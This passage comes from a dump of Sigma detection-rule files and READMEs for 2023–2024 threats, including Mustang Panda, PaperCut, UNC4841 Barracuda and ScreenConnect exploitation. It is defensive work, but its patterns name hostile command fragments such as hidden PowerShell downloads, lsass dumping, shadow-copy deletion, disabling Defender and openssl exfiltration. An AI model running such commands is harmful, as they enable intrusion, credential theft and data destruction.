'\n              - 'iex('\n              - 'Invoke-Expression'\n              - 'Invoke-WebRequest'\n              - 'localgroup administrators'\n              - 'o365accountconfiguration'\n              - 'samaccountname='\n              - 'set-MpPreference'\n              - 'svhost.exe'\n              - 'System.IO.Compression'\n              - 'System.IO.MemoryStream'\n              - 'usoprivate'\n              - 'usoshared'\n              - 'whoami'\n        - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}'\n        - CommandLine|re: 'net\\s+user'\n        - CommandLine|re: 'net\\s+group'\n        - CommandLine|re: 'query\\ssession'\n    selection_special_child_lsass_1:\n        CommandLine|contains: 'lsass'\n    selection_special_child_lsass_2:\n        CommandLine|contains:\n            - 'procdump'\n            - 'tasklist'\n            - 'findstr'\n    selection_child_wget:\n        Image|endswith: '\\wget.exe'\n        CommandLine|contains: 'http'\n    selection_child_curl:\n        Image|endswith: '\\curl.exe'\n        CommandLine|contains: 'http'\n    selection_child_script:\n        CommandLine|contains:\n            - 'E:jscript'\n            - 'e:vbscript'\n    selection_child_localgroup:\n        CommandLine|contains|all:\n            - 'localgroup Administrators'\n            - '/add'\n    selection_child_net:\n        CommandLine|contains: 'net' # Covers net1\n        CommandLine|contains|all:\n            - 'user'\n            - '/add'\n    selection_child_reg:\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableAntiSpyware'\n              - '\\Microsoft\\Windows Defender'\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableRestrictedAdmin'\n              - 'CurrentControlSet\\Control\\Lsa'\n    selection_child_wmic_1:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'process call create'\n    selection_child_wmic_2:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'delete'\n            - 'shadowcopy'\n    selection_child_vssadmin:\n        CommandLine|contains|all:\n            - 'vssadmin'\n            - 'delete'\n            - 'shadows'\n    selection_child_wbadmin:\n        CommandLine|contains|all:\n            - 'wbadmin'\n            - 'delete'\n            - 'catalog'\n    filter_main:\n        CommandLine|contains|all:\n            - 'download.microsoft.com'\n            - 'manageengine.com'\n            - 'msiexec'\n    condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/README.md",
    "content": "# Mustang Panda’s Campaign Against Australia\n\n## Summary\n\nThe Lab52 team has already detected the possibility that actors associated with China, especially Mustang Panda, could carry out attacks against the Australian government.\n\nLab52 has found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.\n\nYou can find more information on the threat in the following articles:\n\n- [New Mustang Panda’s campaign against Australia](https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/)\n\n## Rules\n\n- [Potential APT Mustang Panda Activity Against Australian Gov](./proc_creation_win_apt_mustang_panda_indicators.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml",
    "content": "title: Potential APT Mustang Panda Activity Against Australian Gov\nid: 7806bb49-f653-48d3-a915-5115c1a85234\nstatus: test\ndescription: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52\nreferences:\n    - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.execution\n    - attack.g0129\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - 'copy SolidPDFCreator.dll'\n            - 'C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll'\n    selection_2:\n        CommandLine|contains|all:\n            - 'reg '\n            - '\\Windows\\CurrentVersion\\Run'\n            - 'SolidPDF'\n            - 'C:\\Users\\Public\\Libraries\\PhotoTvRHD\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Okta-Support-System-Breach/README.md",
    "content": "# Okta Support System Breach\n\n## Summary\n\nOn October 19th, Okta Security identified adversarial activity that leveraged access to a stolen credential to access Okta's support case management system. The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases.\n\nYou can find more information on the threat in the following articles:\n\n- [Tracking Unauthorized Access to Okta's Support System](https://sec.okta.com/harfiles)\n- [BeyondTrust Discovers Breach of Okta Support Unit](https://www.beyondtrust.com/blog/entry/okta-support-unit-breach)\n- [How Cloudflare mitigated yet another Okta compromise](https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/)\n\n## Rules\n\n- [Okta 2023 Breach Indicator Of Compromise](./okta_apt_suspicious_user_creation.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Okta-Support-System-Breach/okta_apt_suspicious_user_creation.yml",
    "content": "title: Okta 2023 Breach Indicator Of Compromise\nid: 00a8e92a-776b-425f-80f2-82d8f8fab2e5\nstatus: test\ndescription: |\n    Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach.\n    This rule can be enhanced by filtering out known and legitimate usernames used in your environment.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-10-25\nreferences:\n    - https://www.beyondtrust.com/blog/entry/okta-support-unit-breach\n    - https://developer.okta.com/docs/reference/api/event-types/\ntags:\n    - attack.credential-access\n    - detection.emerging-threats\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        eventtype:\n            - 'user.lifecycle.create'\n            - 'user.lifecycle.activate'\n        target.user.display.name|contains: 'svc_network_backup'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Onyx-Sleet/README.md",
    "content": "# Onyx Sleet APT\n\n## Summary\n\nOnyx Sleet (PLUTONIUM) is a North Korean nation-state threat actor that primarily targets defense and IT services organizations in South Korea, the United States, and India.\n\n- [Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability](https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/)\n\n## Rules\n\n- [Onyx Sleet APT File Creation Indicators](./file_event_win_apt_onyx_sleet_indicators.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Onyx-Sleet/file_event_win_apt_onyx_sleet_indicators.yml",
    "content": "title: Onyx Sleet APT File Creation Indicators\nid: 2fef4fd9-7206-40d1-b4f5-ad6441d0cd9b\nstatus: test\ndescription: Detects file creation activity that is related to Onyx Sleet APT activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: ':\\Windows\\ADFS\\bg\\inetmgr.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/README.md",
    "content": "# PaperCut Print Management Exploitation\n\n## Summary\n\nOn the 21st of April 2023, the Huntress team reported in-the-wild exploitation of zero-day vulnerabilities against PaperCut MF/NG that they were tracking, where attackers were exploiting CVE-2023-27351 and CVE-2023-27350.\n\nYou can find more information on the threat in the following articles:\n\n- [Critical Vulnerabilities in PaperCut Print Management Software](https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software)\n- [APRIL 19 UPDATE | PaperCut MF/NG vulnerability bulletin (March 2023)](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219)\n\n## Rules\n\n- [PaperCut MF/NG Exploitation Related Indicators](./proc_creation_win_papercut_print_management_exploitation_indicators.yml)\n- [PaperCut MF/NG Potential Exploitation](./proc_creation_win_papercut_print_management_exploitation_pc_app.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml",
    "content": "title: PaperCut MF/NG Exploitation Related Indicators\nid: de1bd0b6-6d59-417c-86d9-a44114aede3b\nstatus: test\ndescription: Detects exploitation indicators related to PaperCut MF/NG Exploitation\nreferences:\n    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\n    - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-25\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - ' /c '\n            - 'powershell'\n            - '-nop -w hidden'\n            - 'Invoke-WebRequest'\n            - 'setup.msi'\n            - '-OutFile'\n    selection_2:\n        CommandLine|contains|all:\n            - 'msiexec '\n            - '/i '\n            - 'setup.msi '\n            - '/qn '\n            - 'IntegratorLogin=fimaribahundq'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml",
    "content": "title: PaperCut MF/NG Potential Exploitation\nid: 0934ac71-a331-4e98-a034-d49c491fbbcb\nstatus: test\ndescription: Detects suspicious child processes of \"pc-app.exe\", which could indicate potential exploitation of PaperCut\nreferences:\n    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\n    - https://github.com/huntresslabs/threat-intel/blob/3bad6b0fadfcca3ff5680923e74e39edd72f32da/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml\nauthor: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea)\ndate: 2023-04-20\nmodified: 2023-04-25\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\pc-app.exe'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\calc.exe'\n            - '\\certutil.exe'\n            - '\\cmd.exe'\n            - '\\csc.exe'\n            - '\\cscript.exe'\n            - '\\dllhost.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\scriptrunner.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activity\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml",
    "content": "title: Peach Sandstorm APT Process Activity Indicators\nid: 2e7bbd54-2f26-476e-b4a1-ba5f1a012614\nstatus: test\ndescription: Detects process creation activity related to Peach Sandstorm APT\nreferences:\n    - https://twitter.com/MsftSecIntel/status/1737895710169628824\n    - https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details\nauthor: X__Junior (Nextron Systems)\ndate: 2024-01-15\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'QP''s\\*(58vaP!tF4'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Peach-Sandstorm/proxy_apt_peach_sandstorm_falsefont_backdoor_c2_coms.yml",
    "content": "title: Potential Peach Sandstorm APT C2 Communication Activity\nid: b8225208-81d0-4715-a822-12bcdd583e0f\nstatus: test\ndescription: Detects potential C2 communication activity related to Peach Sandstorm APT\nreferences:\n    - https://twitter.com/MsftSecIntel/status/1737895710169628824\n    - https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details\nauthor: X__Junior (Nextron Systems)\ndate: 2024-01-15\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|endswith:\n            - '/api/Core/Command/Init'\n            - '/api/Core/Command/Restart'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/README.md",
    "content": "# UNC4841 Exploiting Barracuda ESG Zero-Day Vulnerability\n\n## Summary\n\nOn May 23, 2023, Barracuda announced that a zero-day vulnerability (CVE-2023-2868) in the Barracuda Email Security Gateway (ESG) had been exploited in-the-wild as early as October 2022 and that they engaged Mandiant to assist in the investigation. Through the investigation, Mandiant identified a suspected China-nexus actor, currently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for espionage, spanning a multitude of regions and sectors. Mandiant assesses with high confidence that UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People’s Republic of China.\n\nYou can find more information on the threat in the following articles:\n\n- [Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China](https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally)\n- [Barracuda ESG: CVE-2023-2868 Hardening Recommendations](https://mandiant.widen.net/s/qwlxddwdg6/barracuda-cve-2023-2868-hardening)\n\n## Rules\n\n- [UNC4841 - Email Exfiltration File Pattern](./file_event_lnx_apt_unc4841_exfil_mail_pattern.yml)\n- [UNC4841 - Barracuda ESG Exploitation Indicators](./file_event_lnx_apt_unc4841_file_indicators.yml)\n- [UNC4841 - SSL Certificate Exfiltration Via Openssl](./proc_creation_lnx_apt_unc4841_openssl_connection.yml)\n- [UNC4841 - Download Compressed Files From Temp.sh Using Wget](./proc_creation_lnx_apt_unc4841_wget_download_compressed_file_tmep_sh.yml)\n- [UNC4841 - Download Tar File From Untrusted Direct IP Via Wget](./proc_creation_lnx_apt_unc4841_wget_download_tar_files_direct_ip.yml)\n- [UNC4841 - Potential SEASPY Execution](./proc_creation_lnx_atp_unc4841_seaspy_execution.yml)\n\n> **Note**\n>\n> The detection and hunting rules provided for this threat might produce false positives when used outside of the context of incident response or compromise assessment. They are meant to be run and executed on affected systems and environments to look for signs of compromise.\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/file_event_lnx_apt_unc4841_exfil_mail_pattern.yml",
    "content": "title: UNC4841 - Email Exfiltration File Pattern\nid: 0785f462-60b0-4031-9ff4-b4f3a0ba589a\nstatus: test\ndescription: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/file_event_lnx_apt_unc4841_file_indicators.yml",
    "content": "title: UNC4841 - Barracuda ESG Exploitation Indicators\nid: 5627c337-a9b2-407a-a82d-5fd97035ff39\nstatus: test\ndescription: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\nmodified: 2025-08-19\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '/11111.tar'\n            - '/aacore.sh'\n            - '/appcheck.sh'\n            - '/autoins'\n            - '/BarracudaMailService'\n            - '/etc/cron.daily/core_check.sh'\n            - '/etc/cron.daily/core.sh'\n            - '/etc/cron.hourly/aacore.sh'\n            - '/etc/cron.hourly/appcheck.sh'\n            - '/etc/cron.hourly/core.sh'\n            - '/get_fs_info.pl'\n            - '/imgdata.jpg'\n            - '/install_att_v2.tar'\n            - '/install_bvp74_auth.tar'\n            - '/install_helo.tar'\n            - '/install_reuse.tar'\n            - '/intent_helo'\n            - '/intent_reuse'\n            - '/intentbas'\n            # - '/mknod'\n            - '/mod_attachment.lua'\n            - '/mod_content.lua'\n            - '/mod_require_helo.lua'\n            - '/mod_rtf'\n            - '/mod_sender.lua'\n            - '/mod_udp.so'\n            - '/nfsd_stub.ko'\n            - '/resize_reisertab'\n            - '/resize_risertab'\n            - '/resize2fstab'\n            - '/rverify'\n            - '/saslautchd'\n            - '/sendscd'\n            - '/snapshot.tar'\n            - '/tmp/p'\n            - '/tmp/p7'\n            - '/tmp/t'\n            - '/update_v2.sh'\n            - '/update_v31.sh'\n            - '/update_v35.sh'\n            - '/update_version'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_apt_unc4841_openssl_connection.yml",
    "content": "title: UNC4841 - SSL Certificate Exfiltration Via Openssl\nid: 60911c07-f989-4362-84af-c609828ef829\nstatus: test\ndescription: Detects the execution of \"openssl\" to connect to an IP address. This technique was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/openssl'\n        CommandLine|re: '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n        CommandLine|contains|all:\n            - 's_client'\n            - '-quiet'\n            - '-connect'\n        CommandLine|contains:\n            - ':443'\n            - ':8080'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_apt_unc4841_wget_download_compressed_file_tmep_sh.yml",
    "content": "title: UNC4841 - Download Compressed Files From Temp.sh Using Wget\nid: 60d050c4-e253-4d9a-b673-5ac100cfddfb\nstatus: test\ndescription: Detects execution of \"wget\" to download \".zip\" or \".rar\" files from \"temp.sh\", as seen used by UNC4841 during their Barracuda ESG zero day exploitation.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/wget'\n        CommandLine|contains: 'https://temp.sh/'\n        CommandLine|endswith:\n            - '.rar'\n            - '.zip'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_apt_unc4841_wget_download_tar_files_direct_ip.yml",
    "content": "title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget\nid: 23835beb-ec38-4e74-a5d4-b99af6684e91\nstatus: test\ndescription: Detects execution of \"wget\" to download a \"tar\" file from an IP address that doesn't have a trusted certificate, as seen used by UNC4841 during their Barracuda ESG zero day exploitation.\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/wget'\n        CommandLine|re: 'https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n        CommandLine|contains: '--no-check-certificate'\n        CommandLine|endswith: '.tar'\n    filter_main_local_ips:\n        # Note: This filter excludes downloads from private and loopback IP ranges. Remove it from the condition if you want to alert on those as well\n        CommandLine|contains:\n            - 'https://10.' # 10.0.0.0/8\n            - 'https://192.168.' # 192.168.0.0/16\n            - 'https://172.16.' # 172.16.0.0/12\n            - 'https://172.17.'\n            - 'https://172.18.'\n            - 'https://172.19.'\n            - 'https://172.20.'\n            - 'https://172.21.'\n            - 'https://172.22.'\n            - 'https://172.23.'\n            - 'https://172.24.'\n            - 'https://172.25.'\n            - 'https://172.26.'\n            - 'https://172.27.'\n            - 'https://172.28.'\n            - 'https://172.29.'\n            - 'https://172.30.'\n            - 'https://172.31.'\n            - 'https://127.' # 127.0.0.0/8\n            - 'https://169.254.' # 169.254.0.0/16\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/proc_creation_lnx_atp_unc4841_seaspy_execution.yml",
    "content": "title: UNC4841 - Potential SEASPY Execution\nid: f6a711f3-d032-4f9e-890b-bbe776236c84\nstatus: test\ndescription: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor\nreferences:\n    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-16\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/BarracudaMailService'\n            - '/resize2fstab'\n            - '/resize_reisertab'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1212/web_exploit_cve_2024_1212_.yml",
    "content": "title: CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection\nid: eafb8bd5-7605-4bfe-a9ec-0442bc151f15\nstatus: test\ndescription: |\n    Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster.\n    It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an \"Authorization\" header with a base64 encoded value with an uncommon character.\nreferences:\n    - https://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py\n    - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-20\ntags:\n    - attack.initial-access\n    - cve.2024-1212\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_path:\n        cs-method: 'GET'\n        cs-uri-stem|contains|all:\n            - '/access/set'\n            - 'param=enableapi'\n            - 'value=1'\n    selection_keywords:\n        - 'Basic Jz'\n        - 'Basic c7'\n        - 'Basic nO'\n        - \"Basic ';\"\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1708/file_event_win_exploit_cve_2024_1708_screenconnect.yml",
    "content": "title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation\nid: 44d7af7e-88e6-4490-be11-55f7ff4d9fc1\nrelated:\n    - id: 4c198a60-7d05-4daf-8bf7-4136fb6f5c62\n      type: similar\nstatus: test\ndescription: |\n    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress\ndate: 2024-02-21\ntags:\n    - attack.persistence\n    - cve.2024-1708\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\ScreenConnect.Service.exe'\n        TargetFilename|endswith:\n            - 'ScreenConnect\\\\App_Extensions\\\\*.ashx'\n            - 'ScreenConnect\\\\App_Extensions\\\\*.aspx'\n    filter_main_legit_extension:\n        TargetFilename|contains: 'ScreenConnect\\App_Extensions\\\\*\\\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - This will occur legitimately as well and will result in some benign activity.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1708/win_security_exploit_cve_2024_1708_screenconnect.yml",
    "content": "title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security\nid: 4c198a60-7d05-4daf-8bf7-4136fb6f5c62\nrelated:\n    - id: 44d7af7e-88e6-4490-be11-55f7ff4d9fc1\n      type: similar\nstatus: test\ndescription: |\n    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.\n    This requires an Advanced Auditing policy that logs successful Windows Event ID 4663 events, with a SACL set on the directory.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1708\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Caleb Stewart, Huntress\ndate: 2024-02-20\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - cve.2024-1708\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: SACLs must be enabled for the ScreenConnect directory'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        ProcessName|contains: 'ScreenConnect.Service.exe'\n        AccessMask: '0x6'\n        ObjectName|endswith:\n            - 'ScreenConnect\\\\App_Extensions\\\\*.ashx'\n            - 'ScreenConnect\\\\App_Extensions\\\\*.aspx'\n    filter_main_legit_extension:\n        ObjectName|contains: 'ScreenConnect\\App_Extensions\\\\*\\\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1709/file_event_win_exploit_cve_2024_1709_user_database_modification_screenconnect.yml",
    "content": "title: ScreenConnect User Database Modification\nid: 1a821580-588b-4323-9422-660f7e131020\nrelated:\n    - id: 4109cb6a-a4af-438a-9f0c-056abba41c6f\n      type: similar\nstatus: test\ndescription: |\n    Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.\n    This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\nauthor: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress\ndate: 2024-02-21\ntags:\n    - attack.persistence\n    - cve.2024-1709\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.xml'\n        TargetFilename|contains|all:\n            - 'Temp'\n            - 'ScreenConnect'\n        Image|endswith: '\\ScreenConnect.Service.exe'\n    condition: selection\nfalsepositives:\n    - This will occur legitimately as well and will result in some benign activity.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1709/web_exploit_cve_2024_1709_screenconnect.yml",
    "content": "title: CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation\nid: d27eabad-9068-401a-b0d6-9eac744d6e67\nstatus: test\ndescription: |\n    Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.\nreferences:\n    - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\n    - https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\n    - https://www.cve.org/CVERecord?id=CVE-2024-1709\nauthor: Matt Anderson, Huntress\ndate: 2024-02-20\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - cve.2024-1709\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-stem|contains: '/SetupWizard.aspx/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2024/Exploits/CVE-2024-1709/win_security_exploit_cve_2024_1709_user_database_modification_screenconnect.yml",
